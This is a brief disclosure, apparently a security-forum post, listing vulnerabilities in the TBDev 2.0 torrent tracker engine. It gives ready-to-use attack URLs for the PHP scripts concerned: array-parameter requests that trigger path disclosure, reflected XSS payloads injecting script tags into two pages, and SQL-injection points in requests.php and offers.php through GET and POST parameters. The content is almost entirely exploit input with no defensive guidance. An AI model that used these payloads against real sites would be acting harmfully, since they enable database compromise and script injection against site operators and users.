TBDev 2.0 tracker engine
1. Path disclosure
Quote
confirm.php?id[]=
themes/TBDev/stdfoot.php
themes/TBDev/stdhead.php
themes/Gray/stdhead.php
delete.php
captcha.php
details.php?id[]=
Requires authentication:
thanks.php
votesview.php
takeedit.php
comment.php?action=quote&cid[]=
2. XSS
Quote
_http://site/offcomment.php?action=<script>alert(/XSS/)</script>
_http://site/viewrequests.php?category=><script>alert(/XSS/)</script>
3. SQL-Injection
Quote
_http://site/requests.php?action=reset&requestid=sql'
POST:
_http://site/requests.php
action=edit&category=1&id=SQL
---
_http://site/offers.php
action=edit&id=SQL
© https://forum.antichat.ru